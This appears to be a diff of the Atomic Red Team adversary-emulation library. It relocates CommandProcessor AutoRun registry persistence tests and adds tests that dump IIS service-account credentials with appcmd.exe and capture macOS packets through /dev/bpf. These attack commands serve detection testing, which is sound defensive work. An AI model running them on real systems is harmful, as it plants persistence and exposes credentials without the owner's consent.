  - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
+  - Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
+  - Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
  - Atomic Test #1: Authentication Package [windows]
 - T1128 Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1170,6 +1170,8 @@
  - Atomic Test #1: Gsecdump [windows]
  - Atomic Test #2: Credential Dumping with NPPSpy [windows]
  - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
+  - Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) [windows]
+  - Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) [windows]
 - T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
  - Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
@@ -2171,7 +2171,6 @@ defense-evasion:

          '
        name: powershell
-        elevation_required: true
    - name: Bypass UAC by Mocking Trusted Directories
      auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1
      description: |
@@ -10125,13 +10124,12 @@ defense-evasion:

          '
        name: command_prompt
-        elevation_required: true
    - name: Modify Registry of Local Machine - cmd
      auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe
      description: |
        Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup.  This should only be possible when
        CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
-        will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
+        will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
      supported_platforms:
      - windows
      input_arguments:
@@ -10701,7 +10699,6 @@ defense-evasion:
          reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
          reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
        name: command_prompt
-        elevation_required: true
    - name: Windows Powershell Logging Disabled
      auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8
      description: |
@@ -10851,7 +10848,6 @@ defense-evasion:
          reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
          reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
        name: command_prompt
-        elevation_required: true
    - name: Ursnif Malware Registry Key Creation
      auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
      description: |
@@ -10868,7 +10864,6 @@ defense-evasion:
          reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
          reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
        name: command_prompt
-        elevation_required: true
    - name: Terminal Server Client Connection History Cleared
      auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
      description: 'The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe)
@@ -28639,7 +28634,6 @@ privilege-escalation:

          '
        name: powershell
-        elevation_required: true
    - name: Bypass UAC by Mocking Trusted Directories
      auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1
      description: |
@@ -36760,7 +36754,6 @@ privilege-escalation:
          Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
          Remove-Item "#{new_startup_folder}" -Recurse -Force
        name: powershell
-        elevation_required: true
    - name: HKCU - Policy Settings Explorer Run Key
      auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1
      description: "This test will create a new value under HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run
@@ -36861,48 +36854,6 @@ privilege-escalation:
          Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
        name: powershell
        elevation_required: true
-    - name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
-      auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
-      description: |-
-        An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
-        [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
-      supported_platforms:
-      - windows
-      input_arguments:
-        command:
-          description: Command to Execute
-          type: string
-          default: notepad.exe
-      executor:
-        command: New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor"
-          -Name "AutoRun" -Value "#{command}" -PropertyType "String"
-        cleanup_command: Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command
-          Processor" -Name "AutoRun" -ErrorAction Ignore
-        name: powershell
-        elevation_required: true
-    - name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
-      auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
-      description: |-
-        An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
-        [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
-      supported_platforms:
-      - windows
-      input_arguments:
-        command:
-          description: Command to Execute
-          type: string
-          default: notepad.exe
-      executor:
-        command: |-
-          $path = "HKCU:\Software\Microsoft\Command Processor"
-          if (!(Test-Path -path $path)){
-            New-Item -ItemType Key -Path $path
-          }
-          New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
-        cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
-          Processor" -Name "AutoRun" -ErrorAction Ignore
-        name: powershell
-        elevation_required: true
  T1547.006:
    technique:
      x_mitre_platforms:
@@ -37890,6 +37841,47 @@ privilege-escalation:
          -Name AutodialDLL -Value  $env:windir\system32\rasadhlp.dll
        name: powershell
        elevation_required: true
+    - name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
+      auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
+      description: |-
+        An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+        [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+      supported_platforms:
+      - windows
+      input_arguments:
+        command:
+          description: Command to Execute
+          type: string
+          default: notepad.exe
+      executor:
+        command: New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor"
+          -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+        cleanup_command: Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command
+          Processor" -Name "AutoRun" -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
+      auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
+      description: |-
+        An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+        [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+      supported_platforms:
+      - windows
+      input_arguments:
+        command:
+          description: Command to Execute
+          type: string
+          default: notepad.exe
+      executor:
+        command: |-
+          $path = "HKCU:\Software\Microsoft\Command Processor"
+          if (!(Test-Path -path $path)){
+            New-Item -ItemType Key -Path $path
+          }
+          New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+        cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
+          Processor" -Name "AutoRun" -ErrorAction Ignore
+        name: powershell
  T1546.004:
    technique:
      x_mitre_platforms:
@@ -45921,7 +45913,6 @@ execution:
          Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
          Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
        name: powershell
-        elevation_required: true
    - name: PowerShell Downgrade Attack
      auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e
      description: |
@@ -58979,7 +58970,6 @@ persistence:
          Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
          Remove-Item "#{new_startup_folder}" -Recurse -Force
        name: powershell
-        elevation_required: true
    - name: HKCU - Policy Settings Explorer Run Key
      auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1
      description: "This test will create a new value under HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run
@@ -59080,48 +59070,6 @@ persistence:
          Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
        name: powershell
        elevation_required: true
-    - name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
-      auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
-      description: |-
-        An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
-        [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
-      supported_platforms:
-      - windows
-      input_arguments:
-        command:
-          description: Command to Execute
-          type: string
-          default: notepad.exe
-      executor:
-        command: New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor"
-          -Name "AutoRun" -Value "#{command}" -PropertyType "String"
-        cleanup_command: Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command
-          Processor" -Name "AutoRun" -ErrorAction Ignore
-        name: powershell
-        elevation_required: true
-    - name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
-      auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
-      description: |-
-        An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
-        [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
-      supported_platforms:
-      - windows
-      input_arguments:
-        command:
-          description: Command to Execute
-          type: string
-          default: notepad.exe
-      executor:
-        command: |-
-          $path = "HKCU:\Software\Microsoft\Command Processor"
-          if (!(Test-Path -path $path)){
-            New-Item -ItemType Key -Path $path
-          }
-          New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
-        cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
-          Processor" -Name "AutoRun" -ErrorAction Ignore
-        name: powershell
-        elevation_required: true
  T1136.003:
    technique:
      x_mitre_platforms:
@@ -60842,6 +60790,47 @@ persistence:
          -Name AutodialDLL -Value  $env:windir\system32\rasadhlp.dll
        name: powershell
        elevation_required: true
+    - name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
+      auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
+      description: |-
+        An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+        [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+      supported_platforms:
+      - windows
+      input_arguments:
+        command:
+          description: Command to Execute
+          type: string
+          default: notepad.exe
+      executor:
+        command: New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor"
+          -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+        cleanup_command: Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command
+          Processor" -Name "AutoRun" -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
+      auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
+      description: |-
+        An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
+        [reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
+      supported_platforms:
+      - windows
+      input_arguments:
+        command:
+          description: Command to Execute
+          type: string
+          default: notepad.exe
+      executor:
+        command: |-
+          $path = "HKCU:\Software\Microsoft\Command Processor"
+          if (!(Test-Path -path $path)){
+            New-Item -ItemType Key -Path $path
+          }
+          New-ItemProperty -Path $path -Name "AutoRun" -Value "#{command}" -PropertyType "String"
+        cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Command
+          Processor" -Name "AutoRun" -ErrorAction Ignore
+        name: powershell
  T1546.004:
    technique:
      x_mitre_platforms:
@@ -73197,6 +73186,45 @@ credential-access:
          '
        name: powershell
        elevation_required: true
+    - name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using
+        list)
+      auto_generated_guid: 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
+      description: |-
+        AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
+        [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: IIS must be installed prior to running the test
+        prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed")
+          {exit 0} else {exit 1}
+        get_prereq_command: Install-WindowsFeature -name Web-Server -IncludeManagementTools
+      executor:
+        command: |-
+          C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
+          C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
+          C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
+        name: powershell
+        elevation_required: true
+    - name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using
+        config)
+      auto_generated_guid: 42510244-5019-48fa-a0e5-66c3b76e6049
+      description: |-
+        AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
+        [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: IIS must be installed prior to running the test
+        prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed")
+          {exit 0} else {exit 1}
+        get_prereq_command: Install-WindowsFeature -name Web-Server -IncludeManagementTools
+      executor:
+        command: C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
+        name: powershell
+        elevation_required: true
  T1171:
    technique:
      x_mitre_platforms:
@@ -74794,7 +74822,7 @@ credential-access:
          tshark -c 5 -i #{interface}
        name: bash
        elevation_required: true
-    - name: Packet Capture macOS
+    - name: Packet Capture macOS using tcpdump or tshark
      auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608
      description: |
        Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
@@ -74919,6 +74947,88 @@ credential-access:
        cleanup_command: pktmon filter remove
        name: command_prompt
        elevation_required: true
+    - name: Packet Capture macOS using /dev/bpfN with sudo
+      auto_generated_guid: e6fe5095-545d-4c8b-a0ae-e863914be3aa
+      description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few
+        seconds.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        ifname:
+          description: Specify interface to perform PCAP on.
+          type: String
+          default: en0
+        csource_path:
+          description: Path to C program source
+          type: String
+          default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
+        program_path:
+          description: Path to compiled C program
+          type: String
+          default: "/tmp/t1040_macos_pcapdemo"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'compile C program
+
+          '
+        prereq_command: 'exit 1
+
+          '
+        get_prereq_command: 'cc #{csource_path} -o #{program_path}
+
+          '
+      executor:
+        command: 'sudo #{program_path} -i #{ifname} -t 3
+
+          '
+        cleanup_command: 'rm -f #{program_path}
+
+          '
+        name: bash
+        elevation_required: true
+    - name: Filtered Packet Capture macOS using /dev/bpfN with sudo
+      auto_generated_guid: e2480aee-23f3-4f34-80ce-de221e27cd19
+      description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp''
+        and captures packets for a few seconds.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        ifname:
+          description: Specify interface to perform PCAP on.
+          type: String
+          default: en0
+        csource_path:
+          description: Path to C program source
+          type: String
+          default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
+        program_path:
+          description: Path to compiled C program
+          type: String
+          default: "/tmp/t1040_macos_pcapdemo"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'compile C program
+
+          '
+        prereq_command: 'exit 1
+
+          '
+        get_prereq_command: 'cc #{csource_path} -o #{program_path}
+
+          '
+      executor:
+        command: 'sudo #{program_path} -f -i #{ifname} -t 3
+
+          '
+        cleanup_command: 'rm -f #{program_path}
+
+          '
+        name: bash
+        elevation_required: true
  T1552.002:
    technique:
      x_mitre_platforms:
@@ -83930,7 +84040,7 @@ discovery:
          tshark -c 5 -i #{interface}
        name: bash
        elevation_required: true
-    - name: Packet Capture macOS
+    - name: Packet Capture macOS using tcpdump or tshark
      auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608
      description: |
        Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
@@ -84055,6 +84165,88 @@ discovery:
        cleanup_command: pktmon filter remove
        name: command_prompt
        elevation_required: true
+    - name: Packet Capture macOS using /dev/bpfN with sudo
+      auto_generated_guid: e6fe5095-545d-4c8b-a0ae-e863914be3aa
+      description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few
+        seconds.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        ifname:
+          description: Specify interface to perform PCAP on.
+          type: String
+          default: en0
+        csource_path:
+          description: Path to C program source
+          type: String
+          default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
+        program_path:
+          description: Path to compiled C program
+          type: String
+          default: "/tmp/t1040_macos_pcapdemo"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'compile C program
+
+          '
+        prereq_command: 'exit 1
+
+          '
+        get_prereq_command: 'cc #{csource_path} -o #{program_path}
+
+          '
+      executor:
+        command: 'sudo #{program_path} -i #{ifname} -t 3
+
+          '
+        cleanup_command: 'rm -f #{program_path}
+
+          '
+        name: bash
+        elevation_required: true
+    - name: Filtered Packet Capture macOS using /dev/bpfN with sudo
+      auto_generated_guid: e2480aee-23f3-4f34-80ce-de221e27cd19
+      description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp''
+        and captures packets for a few seconds.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        ifname:
+          description: Specify interface to perform PCAP on.
+          type: String
+          default: en0
+        csource_path:
+          description: Path to C program source
+          type: String
+          default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
+        program_path:
+          description: Path to compiled C program
+          type: String
+          default: "/tmp/t1040_macos_pcapdemo"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'compile C program
+
+          '
+        prereq_command: 'exit 1
+
+          '
+        get_prereq_command: 'cc #{csource_path} -o #{program_path}
+
+          '
+      executor:
+        command: 'sudo #{program_path} -f -i #{ifname} -t 3
+
+          '
+        cleanup_command: 'rm -f #{program_path}
+
+          '
+        name: bash
+        elevation_required: true
  T1135:
    technique:
      x_mitre_platforms:
@@ -13,6 +13,10 @@ Several of the tools mentioned in associated sub-techniques may be used by both

 - [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)

+- [Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)](#atomic-test-4---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-list)
+
+- [Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)](#atomic-test-5---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-config)
+

 <br/>

@@ -172,4 +176,88 @@ Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore



+<br/>
+<br/>
+
+## Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
+AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
+[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
+C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
+C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: IIS must be installed prior to running the test
+##### Check Prereq Commands:
+```powershell
+if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-WindowsFeature -name Web-Server -IncludeManagementTools
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
+AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
+[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 42510244-5019-48fa-a0e5-66c3b76e6049
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: IIS must be installed prior to running the test
+##### Check Prereq Commands:
+```powershell
+if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-WindowsFeature -name Web-Server -IncludeManagementTools
+```
+
+
+
+
 <br/>
@@ -104,4 +104,41 @@ atomic_tests:
      Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
    name: powershell
    elevation_required: true
-
+- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
+  auto_generated_guid: 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
+  description: |-
+   AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
+   [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: IIS must be installed prior to running the test
+    prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
+    get_prereq_command: |-
+      Install-WindowsFeature -name Web-Server -IncludeManagementTools
+  executor:
+    command: |-
+      C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
+      C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
+      C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
+    name: powershell
+    elevation_required: true
+- name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
+  auto_generated_guid: 42510244-5019-48fa-a0e5-66c3b76e6049
+  description: |-
+   AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
+   [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: IIS must be installed prior to running the test
+    prereq_command: if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
+    get_prereq_command: |-
+      Install-WindowsFeature -name Web-Server -IncludeManagementTools
+  executor:
+    command: |-
+      C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
+    name: powershell
+    elevation_required: true
@@ -12,7 +12,7 @@ In cloud-based environments, adversaries may still be able to use traffic mirror

 - [Atomic Test #1 - Packet Capture Linux](#atomic-test-1---packet-capture-linux)

- [Atomic Test #2 - Packet Capture macOS](#atomic-test-2---packet-capture-macos)
+- [Atomic Test #2 - Packet Capture macOS using tcpdump or tshark](#atomic-test-2---packet-capture-macos-using-tcpdump-or-tshark)

 - [Atomic Test #3 - Packet Capture Windows Command Prompt](#atomic-test-3---packet-capture-windows-command-prompt)

@@ -22,6 +22,10 @@ In cloud-based environments, adversaries may still be able to use traffic mirror

 - [Atomic Test #6 - Windows Internal pktmon set filter](#atomic-test-6---windows-internal-pktmon-set-filter)

+- [Atomic Test #7 - Packet Capture macOS using /dev/bpfN with sudo](#atomic-test-7---packet-capture-macos-using-devbpfn-with-sudo)
+
+- [Atomic Test #8 - Filtered Packet Capture macOS using /dev/bpfN with sudo](#atomic-test-8---filtered-packet-capture-macos-using-devbpfn-with-sudo)
+

 <br/>

@@ -73,7 +77,7 @@ if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exi
 <br/>
 <br/>

-## Atomic Test #2 - Packet Capture macOS
+## Atomic Test #2 - Packet Capture macOS using tcpdump or tshark
 Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.

 Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A.
@@ -285,4 +289,106 @@ pktmon filter remove



+<br/>
+<br/>
+
+## Atomic Test #7 - Packet Capture macOS using /dev/bpfN with sudo
+Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** e6fe5095-545d-4c8b-a0ae-e863914be3aa
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ifname | Specify interface to perform PCAP on. | String | en0|
+| csource_path | Path to C program source | String | PathToAtomicsFolder/T1040/src/macos_pcapdemo.c|
+| program_path | Path to compiled C program | String | /tmp/t1040_macos_pcapdemo|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sudo #{program_path} -i #{ifname} -t 3
+```
+
+#### Cleanup Commands:
+```bash
+rm -f #{program_path}
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: compile C program
+##### Check Prereq Commands:
+```bash
+exit 1
+```
+##### Get Prereq Commands:
+```bash
+cc #{csource_path} -o #{program_path}
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - Filtered Packet Capture macOS using /dev/bpfN with sudo
+Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** e2480aee-23f3-4f34-80ce-de221e27cd19
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ifname | Specify interface to perform PCAP on. | String | en0|
+| csource_path | Path to C program source | String | PathToAtomicsFolder/T1040/src/macos_pcapdemo.c|
+| program_path | Path to compiled C program | String | /tmp/t1040_macos_pcapdemo|
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+sudo #{program_path} -f -i #{ifname} -t 3
+```
+
+#### Cleanup Commands:
+```bash
+rm -f #{program_path}
+```
+
+
+
+#### Dependencies:  Run with `bash`!
+##### Description: compile C program
+##### Check Prereq Commands:
+```bash
+exit 1
+```
+##### Get Prereq Commands:
+```bash
+cc #{csource_path} -o #{program_path}
+```
+
+
+
+
 <br/>
@@ -28,7 +28,7 @@ atomic_tests:
      tshark -c 5 -i #{interface}
    name: bash
    elevation_required: true
- name: Packet Capture macOS
+- name: Packet Capture macOS using tcpdump or tshark
  auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608
  description: |
    Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed.
@@ -153,4 +153,72 @@ atomic_tests:
    cleanup_command: |-
      pktmon filter remove
    name: command_prompt
-    elevation_required: true 
+    elevation_required: true
+- name: Packet Capture macOS using /dev/bpfN with sudo
+  auto_generated_guid: e6fe5095-545d-4c8b-a0ae-e863914be3aa
+  description: |
+    Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
+  supported_platforms:
+  - macos
+  input_arguments:
+    ifname:
+      description: Specify interface to perform PCAP on.
+      type: String
+      default: en0
+    csource_path:
+      description: Path to C program source
+      type: String
+      default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
+    program_path:
+      description: Path to compiled C program
+      type: String
+      default: /tmp/t1040_macos_pcapdemo
+  dependency_executor_name: bash
+  dependencies:
+    - description: |
+        compile C program
+      prereq_command: |
+        exit 1
+      get_prereq_command: |
+        cc #{csource_path} -o #{program_path}
+  executor:
+    command: |
+      sudo #{program_path} -i #{ifname} -t 3
+    cleanup_command: |
+      rm -f #{program_path}
+    name: bash
+    elevation_required: true
+- name: Filtered Packet Capture macOS using /dev/bpfN with sudo
+  auto_generated_guid: e2480aee-23f3-4f34-80ce-de221e27cd19
+  description: |
+    Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
